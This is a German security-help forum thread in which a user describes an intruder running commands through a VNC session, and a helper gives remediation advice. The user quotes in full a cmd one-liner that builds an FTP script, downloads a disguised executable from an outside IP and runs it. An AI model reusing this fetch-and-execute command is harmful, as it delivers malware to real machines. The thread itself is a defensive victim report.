HANSENET-MNT source: RIPE # Filtered ************************************************* Des weiteren nahm ich mal das Kommando auseinander, um dort vllt ein paar Rückschlüsse zu finden. cmd /c echo OPEN 78.54.224.154 23330>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit Zum x konnte ich nichts finden. Ich nehme an (wegen del x), dass es eine Variable ist, die den Dateinamen aufnimmt bzw zurückgibt. -n unterdrückt die Möglichkeit der automatischen Anmeldung beim ersten Verbindungsaufbau. -s: Dateiname Gibt eine Textdatei an, die ftp-Befehle enthält. Diese Befehle werden nach dem Start von ftp automatisch ausgeführt. Dieser Parameter lässt keine Leerzeichen zu. Verwenden Sie diesen Parameter statt der Umleitung (<). /c führt den durch Zeichenfolge angegebenen Befehl aus und beendet dann die Ausführung. Echo Schaltet die Befehlsanzeigenfunktionen ein bzw. aus oder zeigt eine Meldung an. Ohne Angabe von Parametern zeigt echo die aktuelle Echoeinstellung an. Syntax echo [{on | off}] [Nachricht] Parameter { on| off} Gibt an, ob die Befehlsanzeigenfunktion ein- (on) oder ausgeschaltet (off) wird. Nachricht Gibt den Text an, der auf dem Bildschirm angezeigt werden soll. /? Zeigt Hilfe an der Eingabeaufforderung an. Hinweise • Die Verwendung von echo Nachricht ist hilfreich, wenn echo deaktiviert ist. Falls Sie eine mehrzeilige Meldung anzeigen möchten, ohne dass andere Befehle angezeigt werden, können Sie in der Batchdatei nach dem Befehl echo off mehrere Instanzen des Befehls echo Nachricht verwenden. • Wenn Sie echo off verwenden, wird die Eingabeaufforderung nicht auf dem Bildschirm angezeigt. Geben Sie den Befehl echo on ein, um die Eingabeaufforderung anzuzeigen. • Sie können die Wiedergabe einer Zeile verhindern, indem Sie in einer Batchdatei vor dem Befehl ein At-Zeichen (@) eingeben. • Um eine leere Zeile auf dem Bildschirm wiederzugeben, müssen Sie Folgendes eingeben: echo. • Verwenden Sie ein Caretzeichen (^), um Umleitungs- (< und >) oder Verkettungszeichen (|) zusammen mit echo zu verwenden. Geben Sie das Caretzeichen unmittelbar vor dem jeweiligen Zeichen ein (z. B. ^>, ^ oder ^| ). Geben Sie zwei aufeinander folgende Caretzeichen (^^) ein, wenn Sie das Caretzeichen selbst verwenden möchten. Ftp: open Stellt eine Verbindung zum angegebenen FTP-Server her. Ftp: get Kopiert eine Remotedatei auf den lokalen Computer. Dabei wird der aktuelle Dateiübertragungsmodus verwendet. Beim Befehl sort habe ich gefunden: Die Verwendung des Kleiner-als-Zeichens (<) oder Größer-als-Zeichens (>) zum Angeben der Eingabe- bzw. Ausgabedatei ist u. U. wenig effizient. Zitat:
Zitat:
Zitat:
Die obige Recherche lässt mich vorbehaltlich Eurer Meinung zu meinem FW-Log darauf schließen, dass keinerlei Dateien runtergeladen oder gar ausgeführt wurden. Dennoch bin ich gerade wegen der 2 neuen Probleme (siehe ganz oben) etwas verunsichert. Zitat:
Ich habe mehrere Partitionen und auf C: nur mein System. Dinge wie ‚Eigene Dateien’ oder TBird Emails habe ich von Anfang an auf eine der anderen Partitionen ausgelagert. Auch Spiele sind auf anderen Partitionen installiert und mussten trotz neu aufgesetzter Systeme nicht neu installiert werden. Wenn ich nun ein neues System aufsetze, wer garantiert mir, dass keinerlei befallene Dateien auf den anderen Partitionen schadhaften Code danach erneut platzieren ? Vielen vielen Dank für Eure Geduld mit mir. Solangsam ist mir das nämlich ein wenig peinlich, gerade weil ich wahrscheinlich längst hätte ein neues System aufsetzen können Geändert von taz (11.11.2007 um 22:24 Uhr) |
11.11.2007, 22:39 | #7 | |||||||
/// Winkelfunktion /// TB-Süch-Tiger™ | während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausZitat:
Zitat:
Zitat:
Hast du das Howto für sicheres VNC mal beachtet? Wegen der IP-Adresse: Bist du zufällig selber bei Alice-DSL? Zitat:
Zitat:
Zitat:
Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
11.11.2007, 22:41 | #8 |
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus Sygate PFW Log - xls ist nicht erlaubt - doc datei war zu groß - selbst die txt (tabstop seperated) war zu groß ich habe die log datei stark beschneiden müssen. wer die ganze begutachten will, muss mir einfach bescheidgeben. gerade in excel ist es am einfachsten zu überblicken. |
11.11.2007, 22:48 | #9 | |||
| während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausZitat:
Zitat:
Ja ich bin bei Alice, aber das sind nicht meine IPs gewesen. Zitat:
Thx a lot |
11.11.2007, 23:09 | #10 | |
/// Winkelfunktion /// TB-Süch-Tiger™ | während VNC-Session führt Win-Ausführen-Dialog autom. Commandos ausZitat:
Sie sollte mal sich an einer sicheren Kiste setzen und von dort alle Passwörter ändern. Sie kann auch deinen Rechner nehmen, diesen aber vorher mit z.B. mit Knoppix starten, ist ein Linux-Live-System. Überprüf mal im FW-Log die IP-Adressen bei den VNC-Einträgen. Ich kann da nicht viel zu sagen ob es deine ist oder nicht. Änder jetzt mal endlich den Standortport und schau ob immer noch jmd. raufkommt.
__________________ Logfiles bitte immer in CODE-Tags posten |
Themen zu während VNC-Session führt Win-Ausführen-Dialog autom. Commandos aus |
antivir, autostart, browser, checken, desktop, dringend, einstellung, ellung, email, excel, firefox, firewall, ftp, immer wieder, netzwerk, passwort, programm, regedit, registry, reset, router, suspekt, system, system32, systray, windows, winxp |